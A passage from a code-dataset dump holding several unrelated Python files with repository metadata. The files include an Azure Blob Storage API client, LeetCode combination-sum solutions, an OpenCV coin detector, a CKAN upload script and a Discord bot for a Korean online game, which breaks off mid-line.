list.\n The rest are appended in the order they are passed.\n\n NOTE: A priority system would be useful for the future.\n \"\"\"\n impl_data = deque()\n for column, value in kwargs.items():\n method = 'appendleft'\n func = None\n if column.startswith('$') and not hasattr(self.cls, column[1:]):\n column = column[1:]\n method = 'append'\n if '__' in column:\n column, func = column.split('__')\n else:\n func = column\n column = None\n getattr(impl_data, method)((column, value, func))\n return impl_data\n\n def implement(self, query, value_tuple):\n \"\"\"Transform the query with column types corresponding query column.\"\"\"\n column, value, func = value_tuple\n type_cls = None\n if column and hasattr(self.cls, column):\n try:\n # This fails when the attr is a property.\n type_cls = getattr(self.cls, column).type.__class__\n except AttributeError:\n type_cls = \"PropertyQueryColumn\"\n except exc.InvalidRequestError:\n pass\n impl_cls = self.query_columns.get(type_cls, BaseQueryColumn)\n return impl_cls(self.cls, query).handle(column, value, func)\n\n def pop_exclude_kwargs(self, kwargs):\n for key in kwargs:\n if key.endswith('__exclude'):\n self.exclude_properties.append(key.split('__')[0][1:])\n session.exclude_properties = list(self.exclude_properties)\n return True\n\n def pop_pagination_kwargs(self, kwargs):\n \"\"\"Return popped kwargs of first items in `self.pagination` tuples.\n\n If :meth:`db.session.query.paginate` is passed just a `page`\n argument and `page > 1` the method will fail. If a `per_page`\n argument is passed without a `page` the logical page number\n should be `1`. Therefore if one of the kwargs is missing the\n `page` kwarg will default to `1`.\n \"\"\"\n paginate = {}\n for key in self.pagination:\n key = '$' + key\n if key in kwargs:\n try:\n paginate[key[1:]] = int(kwargs.pop(key))\n except TypeError:\n pass\n if len(paginate) != len(self.pagination):\n paginate[self.page] = 1\n return paginate\n\n def paginate_query(self, query, paginate):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from query.\"\"\"\n\n try:\n return query.paginate(paginate.get(self.page, 1),\n paginate.get(self.per_page, query.count()),\n False)\n except exc.OperationalError as e:\n msg = \"Invalid Value: {}\".format(e.orig.args[-1])\n errors = {'query_construction': [msg]}\n raise InvalidFormError(description=errors)\n","repo_name":"mvellasco/powernap","sub_path":"powernap/query/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3814300957","text":"import base64\nimport datetime\nimport json\nimport xmltodict\nfrom logging import Logger\nimport requests\nimport time\n\nfrom insightconnect_plugin_runtime.exceptions import PluginException\n\nfrom icon_azure_blob_storage.util.helpers import xml_to_json\nfrom icon_azure_blob_storage.util.endpoints import (\n COMMON_URI,\n O365_AUTH_ENDPOINT,\n O365_AUTH_RESOURCE,\n LIST_CONTAINERS_ENDPOINT,\n CONTAINER_ENDPOINT,\n BLOB_ENDPOINT,\n LIST_BLOBS_ENDPOINT,\n)\nfrom typing import Union\nfrom icon_azure_blob_storage.util.constants import BlobType, HeaderParam, UrlParam\n\n\nclass AzureBlobStorageAPI:\n def __init__(self, client_id: str, client_secret: str, tenant_id: str, account_name: str, logger: Logger):\n self._tenant_id = tenant_id\n self._client_id = client_id\n self._client_secret = client_secret\n self._account_name = account_name\n self._uri = COMMON_URI.format(account=account_name)\n self._logger = logger\n self._token_expires_on = 0\n self.auth_token = None\n\n @property\n def auth_token(self) -> str:\n if self._token_expires_on and self._token_expires_on - time.time() > 10:\n return self._auth_token\n\n request_data = {\n \"grant_type\": \"client_credentials\",\n \"client_id\": self._client_id,\n \"resource\": O365_AUTH_RESOURCE,\n \"client_secret\": self._client_secret,\n }\n\n formatted_endpoint = O365_AUTH_ENDPOINT.format(self._tenant_id)\n self._logger.info(f\"Getting token from: {formatted_endpoint}\")\n response = requests.request(\"POST\", formatted_endpoint, data=request_data)\n self._logger.info(f\"Authentication request status: {str(response.status_code)}\")\n\n if response.status_code != 200:\n self._logger.error(response.text)\n raise PluginException(\n cause=\"Unable to authorize against Azure Storage API.\",\n assistance=\"The application may not be authorized to connect to the Azure Storage API. \"\n \"Please contact your Azure administrator.\",\n data=response.text,\n )\n response_json = response.json()\n self.auth_token = response_json.get(\"access_token\")\n self._token_expires_on = int(response_json.get(\"expires_on\"))\n self._logger.info(f\"Authentication Token: ****************{self._auth_token[-5:]}\")\n\n return self._auth_token\n\n @auth_token.setter\n def auth_token(self, auth_token):\n self._auth_token = auth_token\n\n def _get_headers(self, additional_headers: dict = None) -> dict:\n base_headers = {\n \"x-ms-version\": \"2021-04-10\",\n \"x-ms-date\": datetime.datetime.utcnow().strftime(\"%a, %d %b %Y %H:%M:%S GMT\"),\n \"Authorization\": f\"Bearer {self.auth_token}\",\n }\n if additional_headers:\n return {**base_headers, **additional_headers}\n return base_headers\n\n def create_container(self, container_name: str, additional_headers: dict = None) -> bool:\n self._logger.info(f\"Creating a container named {container_name} for {self._account_name} account...\")\n self.make_request(\n method=\"PUT\",\n endpoint=CONTAINER_ENDPOINT.format(container_name=container_name),\n headers=self._get_headers(additional_headers),\n )\n return True\n\n def list_containers(\n self,\n prefix: str = \"\",\n max_results: int = None,\n include: [] = None,\n timeout: int = None,\n additional_headers: dict = None,\n ) -> object:\n self._logger.info(f\"Listing containers belonging to {self._account_name}...\")\n json_response = self.make_json_request(\n method=\"GET\",\n endpoint=LIST_CONTAINERS_ENDPOINT,\n headers=self._get_headers(additional_headers),\n params={\n UrlParam.PREFIX: prefix,\n UrlParam.MAX_RESULTS: max_results,\n UrlParam.INCLUDE: include,\n UrlParam.TIMEOUT: timeout,\n },\n )\n return json_response.get(\"EnumerationResults\", {})\n\n def delete_container(self, container_name: str, additional_headers: dict = None) -> bool:\n self._logger.info(f\"Deleting a container named {container_name} for {self._account_name} account...\")\n self.make_request(\n method=\"DELETE\",\n endpoint=CONTAINER_ENDPOINT.format(container_name=container_name),\n headers=self._get_headers(additional_headers),\n )\n return True\n\n def list_blobs(\n self,\n container_name: str,\n prefix: str = None,\n delimiter: str = None,\n max_results: int = None,\n include: [] = None,\n timeout: int = None,\n additional_headers: dict = None,\n ) -> object:\n self._logger.info(f\"Listing blobs in {container_name} container belonging to {self._account_name}...\")\n json_response = self.make_json_request(\n method=\"GET\",\n endpoint=LIST_BLOBS_ENDPOINT.format(container_name=container_name),\n headers=self._get_headers(additional_headers),\n params={\n UrlParam.PREFIX: prefix,\n UrlParam.DELIMITER: delimiter,\n UrlParam.MAX_RESULTS: max_results,\n UrlParam.INCLUDE: include,\n UrlParam.TIMEOUT: timeout,\n },\n )\n return json_response.get(\"EnumerationResults\", {})\n\n def put_blob(\n self,\n container_name: str,\n blob_name: str,\n blob_type: str,\n timeout: int = None,\n block_blob_content: str = None,\n access_tier: str = None,\n additional_headers: dict = None,\n page_blob_content_length: str = None,\n ) -> bool:\n\n self._logger.info(\n f\"Creating a blob named {blob_name} in {container_name} container for {self._account_name} account...\"\n )\n block_blob_content, page_blob_content_length = self._parse_put_blob_params(\n blob_type=blob_type,\n block_blob_content=block_blob_content,\n page_blob_content_length=page_blob_content_length,\n )\n headers = self._get_put_blob_headers(\n blob_type=blob_type,\n additional_headers=additional_headers,\n block_blob_content=block_blob_content,\n page_blob_content_length=page_blob_content_length,\n access_tier=access_tier,\n )\n self.make_request(\n method=\"PUT\",\n endpoint=BLOB_ENDPOINT.format(container_name=container_name, blob_name=blob_name),\n headers=headers,\n params={UrlParam.TIMEOUT: timeout},\n data=block_blob_content.encode().decode(\"unicode_escape\").encode(\"raw_unicode_escape\"),\n )\n return True\n\n def get_blob(\n self,\n container_name: str,\n blob_name: str,\n snapshot_id: str = None,\n version_id: str = None,\n byte_to_string: str = False,\n additional_headers: dict = None,\n ) -> Union[bytes, str]:\n\n self._logger.info(\n f\"Getting a blob named {blob_name} in {container_name} container for {self._account_name} account...\"\n )\n response = self.make_request(\n method=\"GET\",\n endpoint=BLOB_ENDPOINT.format(container_name=container_name, blob_name=blob_name),\n headers=self._get_headers(additional_headers),\n params={\n UrlParam.SNAPSHOT_ID: snapshot_id,\n UrlParam.VERSION_ID: version_id,\n },\n )\n if byte_to_string:\n return response.text\n\n return str(base64.b64encode(response.content), \"utf-8\")\n\n def delete_blob(\n self,\n container_name: str,\n blob_name: str,\n snapshot_id: str = None,\n version_id: str = None,\n delete_snapshots: str = None,\n additional_headers: dict = None,\n ) -> str:\n\n if delete_snapshots:\n additional_headers[HeaderParam.DELETE_SNAPSHOTS] = delete_snapshots\n self._logger.info(\n f\"Deleting a blob named {blob_name} in {container_name} container for {self._account_name} account...\"\n )\n response = self.make_request(\n method=\"DELETE\",\n endpoint=BLOB_ENDPOINT.format(container_name=container_name, blob_name=blob_name),\n headers=self._get_headers(additional_headers),\n params={UrlParam.SNAPSHOT_ID: snapshot_id, UrlParam.VERSION_ID: version_id},\n )\n\n return response.headers.get(HeaderParam.DELETE_TYPE_PERMANENT)\n\n def make_request(\n self, method: str, endpoint: str, headers: dict, params: dict = None, data: bytes = \"\"\n ) -> requests.Response:\n try:\n response = requests.request(\n method=method, url=self._uri + endpoint, headers=headers, params=params, data=data\n )\n\n if response.status_code == 400:\n raise PluginException(\n cause=\"Invalid input parameters.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if response.status_code == 401:\n raise PluginException(preset=PluginException.Preset.API_KEY, data=xml_to_json(response.text))\n if response.status_code == 403:\n raise PluginException(\n cause=\"Operation is not allowed.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if response.status_code == 404:\n raise PluginException(\n cause=\"Resource not found.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if response.status_code == 409:\n raise PluginException(\n cause=\"Request made conflicts with an existing resource.\",\n assistance=\"Please verify inputs and if the issue persists, contact support.\",\n data=xml_to_json(response.text),\n )\n if 400 <= response.status_code < 500:\n raise PluginException(\n preset=PluginException.Preset.UNKNOWN,\n data=xml_to_json(response.text),\n )\n if response.status_code >= 500:\n raise PluginException(preset=PluginException.Preset.SERVER_ERROR, data=xml_to_json(response.text))\n\n if 200 <= response.status_code < 300:\n return response\n\n raise PluginException(preset=PluginException.Preset.UNKNOWN, data=response.text)\n except requests.exceptions.HTTPError as e:\n raise PluginException(preset=PluginException.Preset.UNKNOWN, data=e)\n\n def make_json_request(self, method: str, endpoint: str, headers: dict = None, params: dict = None) -> dict:\n try:\n response = self.make_request(method=method, endpoint=endpoint, params=params, headers=headers)\n return xmltodict.parse(response.text)\n except json.decoder.JSONDecodeError as e:\n raise PluginException(preset=PluginException.Preset.INVALID_JSON, data=e)\n\n def _parse_put_blob_params(self, blob_type: str, block_blob_content: str, page_blob_content_length: str):\n if blob_type == BlobType.PAGE_BLOB and not page_blob_content_length:\n raise PluginException(\n cause=f\"Blob Content Length parameter is required for {BlobType.PAGE_BLOB}\",\n assistance=\"Please provide this parameter or change Blob Type.\",\n )\n if blob_type != BlobType.PAGE_BLOB and page_blob_content_length:\n self._logger.warning(\n f\"Blob Content Length param can be used only with {BlobType.PAGE_BLOB}. This parameter will be ignored.\"\n )\n page_blob_content_length = 0\n if blob_type != BlobType.BLOCK_BLOB and block_blob_content:\n self._logger.warning(\n f\"Blob Content param can be used only with {BlobType.BLOCK_BLOB}. Initializing empty {blob_type}.\"\n )\n block_blob_content = \"\"\n return block_blob_content, page_blob_content_length\n\n def _get_put_blob_headers(\n self,\n blob_type: str,\n additional_headers: dict = None,\n block_blob_content: str = \"\",\n page_blob_content_length: str = None,\n access_tier: str = \"\",\n ) -> dict:\n additional_headers[HeaderParam.BlobType] = blob_type\n if access_tier:\n additional_headers[HeaderParam.ACCESS_TIER] = access_tier\n if page_blob_content_length:\n additional_headers[HeaderParam.BLOB_CONTENT_LENGTH] = str(page_blob_content_length)\n if block_blob_content:\n additional_headers[HeaderParam.CONTENT_LENGTH] = str(len(block_blob_content))\n return self._get_headers(additional_headers)\n","repo_name":"rapid7/insightconnect-plugins","sub_path":"plugins/azure_blob_storage/icon_azure_blob_storage/util/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":13187,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"23057180989","text":"'''\n39. Combination Sum\n\nMedium\n\nGiven an array of distinct integers candidates and a target integer target, return a list of all unique combinations of candidates where the chosen numbers sum to target. You may return the combinations in any order.\n\nThe same number may be chosen from candidates an unlimited number of times. Two combinations are unique if the \nfrequency of at least one of the chosen numbers is different.\n\nThe test cases are generated such that the number of unique combinations that sum up to target is less than 150 combinations for the given input.\n\n \nExample 1:\nInput: candidates = [2,3,6,7], target = 7\nOutput: [[2,2,3],[7]]\nExplanation:\n2 and 3 are candidates, and 2 + 2 + 3 = 7. Note that 2 can be used multiple times.\n7 is a candidate, and 7 = 7.\nThese are the only two combinations.\n\nExample 2:\nInput: candidates = [2,3,5], target = 8\nOutput: [[2,2,2,2],[2,3,3],[3,5]]\n\nExample 3:\nInput: candidates = [2], target = 1\nOutput: []\n \n\nConstraints:\n\n1 <= candidates.length <= 30\n2 <= candidates[i] <= 40\nAll elements of candidates are distinct.\n1 <= target <= 40\n\n'''\n\n# SOLUTION\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n def targetCombination(candidates, target, idx, temp):\n if idx == len(candidates):\n if target == 0:\n result.append(temp[:])\n return\n\n if candidates[idx] <= target:\n temp.append(candidates[idx])\n # same index\n targetCombination(candidates, target - candidates[idx], idx, temp)\n temp.pop()\n\n targetCombination(candidates, target, idx+1, temp)\n\n result = []\n targetCombination(candidates, target, 0, [])\n\n return result\n \n\n# Using DFS\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n if not candidates: return []\n res = []\n candidates.sort()\n def dfs(idx, path, cur):\n if cur > target: \n return\n \n if cur == target:\n res.append(path)\n return\n \n for i in range(idx, len(candidates)):\n dfs(i, path+[candidates[i]], cur+candidates[i])\n\n dfs(0, [], 0)\n return res\n\n\n\n\n# practice\ndef combinationSum(idx, arr, target, ds):\n if idx == len(arr):\n if target == 0:\n ans.append(ds[:])\n return\n\n if arr[idx] <= target: # pick condition\n ds.append(arr[idx])\n combinationSum(idx, arr, target - arr[idx], ds)\n ds.pop()\n\n combinationSum(idx + 1, arr, target, ds)\n\n\narr = [2, 3, 6, 7]\nans = []\ncombinationSum(0, arr, 12, [])\nprint(ans)\n","repo_name":"SahnawazShaban/Leetcode-and-GFG-Problems","sub_path":"Step-Up/Recursion/4) Combination Sum I.py","file_name":"4) Combination Sum I.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"19213856939","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 13 11:09:45 2018\n\n@author: Ian, Bram\n@version: 0.1\n\nthis coin detection uses 2 core features. \n1 is the diffrence list from the system. this list contains the all the size\ndiffrences between the coins. Secondly is a colour finder with selected \nwich will set a boundry between which values of the diffrences its going to look.\nWich means that it atleast 2 coins of diffrent values are needed to work in the same picture. \nThis is more to let the system work with variable distances. this will then \nselect the largest coin in the picture and use that one as a referance \nbetween the other coins. \n\"\"\"\n\nimport copy\n\nimport numpy as np\n\n#from __future__ import division\nimport cv2\n\n\ndef nothing(*arg):\n pass\n\n\ndef get_circles(image, maskrange, kernel, minRadius, maxRadius):\n colorLow = np.array([maskrange[0], maskrange[1], maskrange[2]])\n colorHigh = np.array([maskrange[3], maskrange[4], maskrange[5]])\n mask = cv2.inRange(image, colorLow, colorHigh)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernal)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernal)\n threshold = cv2.adaptiveThreshold(\n mask, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 5)\n circles = cv2.HoughCircles(threshold, cv2.HOUGH_GRADIENT, 2, 80,\n param1=45,\n param2=50,\n minRadius=minRadius,\n maxRadius=maxRadius)\n circles = np.uint16(np.around(circles))\n return circles\n\n\n# CV parameters\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfontScale = 1\nfontColor = (255, 255, 255)\nlineType = 2\npower = 1\nresize = 0.25\n# coin list\ncoins = [\n [\"Copper 1 cent\", 0.01],\n [\"Copper 2 cent\", 0.02],\n [\"Copper 5 cent\", 0.05],\n [\"Messing 10 cent\", 0.10],\n [\"Messing 20 cent\", 0.20],\n [\"Messing 50 cent\", 0.50],\n [\"Silver 1 Euro\", 1],\n [\"Silver 2 Euro\", 2]\n]\n# size diffrences\ndiffrence = np.array([\n [1.000,\t1.170,\t1.307,\t1.227,\t1.386,\t1.500,\t1.432,\t1.500],\n [0.854, 1.000,\t1.117,\t1.049,\t1.184,\t1.282,\t1.223,\t1.282],\n [0.765,\t0.896,\t1.000,\t0.939,\t1.061,\t1.148,\t1.096,\t1.148],\n [0.815,\t0.954,\t1.065,\t1.000,\t1.130,\t1.222,\t1.167,\t1.222],\n [0.721,\t0.844,\t0.943,\t0.885,\t1.000,\t1.082,\t1.033,\t1.082],\n [0.667,\t0.780,\t0.871,\t0.818,\t0.924,\t1.000,\t0.955,\t1.000],\n [0.698,\t0.817,\t0.913,\t0.857,\t0.968,\t1.048,\t1.000,\t1.048],\n [0.667,\t0.780,\t0.871,\t0.818,\t0.924,\t1.000,\t0.955,\t1.000]\n])\n# increasing the power to enlarge the saclings diffrence. works best with 2 euro coins\nfor x in range(0, len(diffrence)):\n for y in range(0, len(diffrence[0])):\n diffrence[x][y] = diffrence[x][y]**power\n\n# colour spaces that the system works in\nicol = []\nicolC = (8, 41, 0, 19, 255, 255) # Copper\nicolY = (20, 31, 0, 35, 255, 255) # Yellow\nicolS = (20, 28, 0, 31, 70, 255) # Silver\nicol.append([icolC, icolY, icolS])\n\ncv2.namedWindow('colorTest')\n\n# list of images\n\nimages = [\n ['Coins/Coin1.jpg', 0]\n ['Coins/Coin2.jpg', 0],\n ['Coins/Coin3.jpg', 0],\n ['Coins/Coin4.jpg', 0],\n ['Coins/Coin5.jpg', 0]\n]\n\nfor pic in range(0, len(images)):\n loc = images[pic][0]\n frame = cv2.imread(loc)\n\n framecopy = copy.copy(frame)\n\n frameBGR = cv2.GaussianBlur(frame, (7, 7), 0)\n frameBGR = cv2.medianBlur(frameBGR, 15)\n\n hsv = cv2.cvtColor(frameBGR, cv2.COLOR_BGR2HSV)\n\n kernal = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))\n circles1 = get_circles(hsv, icol[images[pic][1]][0], kernal, 80, 140)\n circles2 = get_circles(hsv, icol[images[pic][1]][1], kernal, 100, 140)\n circles3 = get_circles(hsv, icol[images[pic][1]][2], kernal, 100, 140)\n\n data = []\n error = 25\n # extract all copper coins out the list\n for c in circles1[0, :]:\n data.append([c[2], 'C', 1.0, c[0], c[1]])\n # extract all messing coins out the list\n for c in circles2[0, :]:\n\n data.append([c[2], 'Y', 1.0, c[0], c[1]])\n # look trough the list of messing coins that are actually silver\n for d in data:\n if (d[1] == 'Y'):\n for c in circles3[0, :]:\n if(c[0]-error < d[3] and d[3] < c[0]+error and\n c[1]-error < d[4] and d[4] < c[1]+error):\n d[1] = 'S'\n\n # find smallest and largest in picture\n sizesave = [data[0][0], data[1][0]]\n locationsave = [0, 1]\n for x in range(0, len(data)):\n if (data[x][0] < sizesave[0]):\n sizesave[0] = data[x][0]\n locationsave[0] = x\n elif (data[x][0] > sizesave[1]):\n sizesave[1] = data[x][0]\n locationsave[1] = x\n\n for x in range(0, len(data)):\n data[x][2] = (data[locationsave[1]][0]/data[x][0])**power\n\n circles = np.hstack((circles1, circles2))\n temp = copy.deepcopy(diffrence)\n lowest = 1\n ysave = 7\n\n # find what collum there needs to be worked in\n for x in range(0, len(diffrence)):\n for y in range(0, len(diffrence[0])):\n temp[x][y] = abs(diffrence[x][y]-data[locationsave[0]][2])\n if (abs(temp[x][y]) < lowest):\n ysave = y\n lowest = abs(temp[x][y])\n\n tempvalue = 0\n typesave = 0\n # Identify coin and add to som\n for n in range(0, len(data)):\n lowest = 10000000\n if (data[n][1] == 'C'):\n for x in range(0, 3):\n tempvalue = diffrence[x][ysave]-data[n][2]\n if (abs(tempvalue) < lowest):\n lowest = abs(tempvalue)\n typesave = x\n elif (data[n][1] == 'Y'):\n for x in range(3, 6):\n tempvalue = diffrence[x][ysave]-data[n][2]\n if (abs(tempvalue) < lowest):\n lowest = abs(tempvalue)\n typesave = x\n elif (data[n][1] == 'S'):\n for x in range(6, 8):\n tempvalue = diffrence[x][ysave]-data[n][2]\n if (abs(tempvalue) < lowest):\n lowest = abs(tempvalue)\n typesave = x\n data[n].append(coins[typesave][0])\n data[n].append(coins[typesave][1])\n data[n].append(lowest)\n data[n].append(typesave)\n counter = 0\n value = 0\n\n for i in circles1[0, :]:\n cv2.circle(frameBGR, (i[0], i[1]), i[2], (0, 255, 0), 2)\n cv2.circle(frameBGR, (i[0], i[1]), 2, (0, 0, 255), 3)\n for i in circles[0, :]:\n cv2.circle(framecopy, (i[0], i[1]), i[2], (0, 255, 0), 2)\n cv2.circle(framecopy, (i[0], i[1]), 2, (0, 0, 255), 3)\n\n cv2.putText(framecopy, \"coin : {}, {}\".format(counter, data[counter][5]),\n (i[0], i[1]),\n font,\n fontScale,\n fontColor,\n lineType)\n value += data[counter][6]\n counter += 1\n\n # print found value of coins\n print(\"found: {:5.2f} Euro worth of coins\".format(value))\n\n # show results\n\n framecopy = cv2.resize(framecopy, (0, 0), fx=resize*2.5, fy=resize*2.5)\n cv2.imshow('found', framecopy)\n frameBGR = cv2.resize(frameBGR, (0, 0), fx=resize, fy=resize)\n cv2.imshow('blurred', frameBGR)\n cv2.imwrite((images[pic][0][:-4]+\"_found\"+images[pic][0][-4:]), framecopy)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\n# cv2.destroyAllWindows()\n","repo_name":"peacefighter1996/Coin_Recognition","sub_path":"Coin_detection.py","file_name":"Coin_detection.py","file_ext":"py","file_size_in_byte":7350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1942502034","text":"import re\nstr = '''rakesh@gamil.com, rocky@gammil.com, rakesh.rr@gmail.com, rakesh.rr.rr@gmail.com'''\nf1 = open(\"f1.txt\", 'w')\nf1.write(\"\")\nf1.close()\nf1 = open(\"f1.txt\", 'a')\nl = re.findall('\\S+@\\S+',str)\nz=0\nfor i in l:\n z+=1\n f1.write(f\"Email{z}:{i}\\n\") \nf1.close()","repo_name":"rakesh-201/Python-course","sub_path":"r_EmailCollector.py","file_name":"r_EmailCollector.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"28436317343","text":"### användning från commandline , samt avrundas med att printa ut dataset-id - obs namn på dataset måste vara små bokstäver, korrigerar med hjälp av title nedan (): python skapa_paket_med_variabler.py dreamdataset \"Vårt dataset är bäst\"\r\n\r\nfrom ckanapi import RemoteCKAN, NotAuthorized, NotFound,ValidationError, SearchQueryError, SearchError, CKANAPIError, ServerIncompatibleError\r\nimport sys\r\n\r\n## variabler ##\r\nnamn = str(sys.argv[1])\r\nbeskrivning = str(sys.argv[2])\r\norganisation = ''\r\nlicens = 'cc-0'\r\nutgivare = ''\r\nmail = ''\r\nstatus = 'http://publications.europa.eu/resource/authority/access-right/PUBLIC'\r\nkontakt = ''\r\nsprak = 'http://publications.europa.eu/resource/authority/language/SWE'\r\ntema = 'http://publications.europa.eu/resource/authority/data-theme/SOCI'\r\nfrekvens = 'http://publications.europa.eu/resource/authority/frequency/ANNUAL'\r\ntitel = namn.title()\r\n\r\n#api-variabler#\r\n\r\nua = 'ckanapimalmo/1.0 (+https://ckan-malmo.dataplatform.se)'\r\nmalmoapi = RemoteCKAN('https://ckan-malmo.dataplatform.se/', user_agent=ua, apikey='')\r\n\r\n## skapa tomt dataset ###\r\ntry:\r\n malmoapi.action.package_create(\r\n package_id = namn,\r\n name = namn ,\r\n notes = beskrivning,\r\n owner_org = organisation,\r\n license_id = licens,\r\n author = utgivare,\r\n author_email = mail,\r\n #private = 'false',\r\n access_rights = status,\r\n contact_name = kontakt,\r\n language = sprak,\r\n theme = tema,\r\n # for a list of themes check https://docs.dataportal.se/dcat/en/#5.3\r\n frequency = frekvens,\r\n title = titel)\r\n \r\nexcept (NotAuthorized, NotFound,ValidationError, SearchQueryError, SearchError, CKANAPIError, ServerIncompatibleError) as e:\r\n print (e)\r\n print (e.args)\r\n\r\n\r\npaketinfo = malmoapi.call_action('package_show', {'id': namn})\r\nidinfo = paketinfo['id']\r\nprint(\"Paket är skapat med id: \" + idinfo)\r\n\r\n\r\n","repo_name":"mwigge/ckan","sub_path":"python/skapa_paket_med_variabler.py","file_name":"skapa_paket_med_variabler.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"20542958877","text":"'''\r\n작성일:2023년 9월 27일\r\n작성자:202095109 양사호\r\n설명:반복문으로 펙토리얼 구하기.\r\n 오늘의 마지막 문제\r\n'''\r\n\r\nnum=int(input(\"num:\"))\r\nfact=1\r\n\r\nfor i in range(num):\r\n fact=fact*(i+1)\r\n\r\nprint(f\"{num}! is {fact}\")","repo_name":"MuLVenus/python","sub_path":"202095109/5장/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38549084665","text":"import discord\nfrom discord.ext import commands\nimport requests\nimport json\nimport random\nfrom selenium import webdriver\nimport server_name_converter\nimport time\nimport os\n\n\napp = commands.Bot(command_prefix=\"#\")\n\ndiscord_api_key = os.environ.get('discord_api_key')\nneople_api_key = os.environ.get('neople_api_key')\n\nbrowser_options = webdriver.ChromeOptions()\nbrowser_options.add_argument('headless')\nbrowser_options.add_argument('window-size=1920x1080')\nbrowser_options.add_argument(\"disable-gpu\")\nbrowser_options.add_argument('--no-sandbox')\n\nbrowser_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\nbrowser = webdriver.Chrome(executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"), chrome_options=browser_options)\n\n\n@app.event\nasync def on_ready():\n print(\"다음으로 로그인합니다: \", end=\"\")\n print(app.user.name)\n print(\"Connection was successful. \")\n await app.change_presence(status=discord.Status.online, activity=discord.Game(\"던전앤파이터\"))\n\n\n@app.command(name='명령어')\nasync def help_command(ctx):\n embed = discord.Embed(title='명령어를 알려줄게!', color=discord.Color.blue())\n embed.set_thumbnail(url='https://www.city.kr/files/attach/images/161/715/991/005/169199853332e0e576fd914f085c0b5a.gif')\n embed.add_field(name='#딜', value='1시딜을 알려줍니다.\\nex) #딜 $P 또는 #딜 카인 $P\\n서버명을 입력하지 않으면 카인 서버로 검색', inline=False)\n embed.add_field(name='#버프력', value='버프력을 알려줍니다.\\nex) #버프력 오야븜미 또는 #버프력 카인 오야븜미\\n서버명을 입력하지 않으면 카인 서버로 검색', inline=False)\n embed.add_field(name='#닉', value='사용 가능한 닉네임의 서버를 알려줍니다..\\nex) #닉 $P', inline=False)\n embed.add_field(name='#머먹지', value='메뉴를 추천해줍니다.', inline=False)\n embed.add_field(name='#닉넴수', value='던파 서버에서 사용중인 닉네임 수를 알려줍니다.', inline=False)\n await ctx.send(embed=embed)\n\n\n@app.command(name='핑')\nasync def ping(ctx, number: int):\n await ctx.send(number)\n\n\n@app.command(name='잘자')\nasync def ping(ctx):\n await ctx.send('https://blogimg.goo.ne.jp/user_image/44/3a/b2ec2e835264fc5abae347e8721f1748.gif')\n\n\n@app.command(name='화이팅')\nasync def ping(ctx):\n await ctx.send('https://media.tenor.com/images/da43d28ce922ccf6c36359c11ead912d/tenor.gif')\n\n\n@app.command(name='박수')\nasync def ping(ctx):\n await ctx.send('와! 짝짝짝!!')\n\n\n@app.command(name=\"머먹지\")\nasync def random_menu(ctx):\n lst = [\"피자\", \"치킨\", \"마라탕\", \"찜닭\", \"라면\", \"굶어\", \"햄버거\", \"홍어\", \"토끼구이\", \"떡볶이\", \"족발\", \"중국집\", \"빵과 우유\", \"돈까스\", \"불고기\"]\n await ctx.send(lst[random.randrange(0, len(lst))]+\" ㅇㅅㅇ\")\n\n\n@app.command(name='스샷')\nasync def get_character_image(ctx, *input: str):\n if len(input) is 1:\n char_name = str(input[0])\n URL = \"https://api.neople.co.kr/df/servers/cain/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n picture = 'https://img-api.neople.co.kr/df/servers/cain/characters/'+char_id+'?zoom=2'\n embed = discord.Embed(title=dict_data.get('characterName'), color=discord.Color.blue())\n embed.set_image(url=picture)\n\n await ctx.send(embed=embed)\n\n else:\n server_kor = str(input[0])\n char_name = str(input[1])\n server_eng = server_name_converter.to_eng(server_kor)\n\n URL = \"https://api.neople.co.kr/df/servers/\"\n URL += server_eng\n URL += \"/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n picture = 'https://img-api.neople.co.kr/df/servers/'+server_eng+'/characters/'+char_id+'?zoom=2'\n embed = discord.Embed(title=dict_data.get('characterName'), color=discord.Color.blue())\n embed.set_image(url=picture)\n\n await ctx.send(embed=embed)\n\n\n@app.command(name='닉넴수')\nasync def how_many_nicknames(ctx, input: str):\n URL = 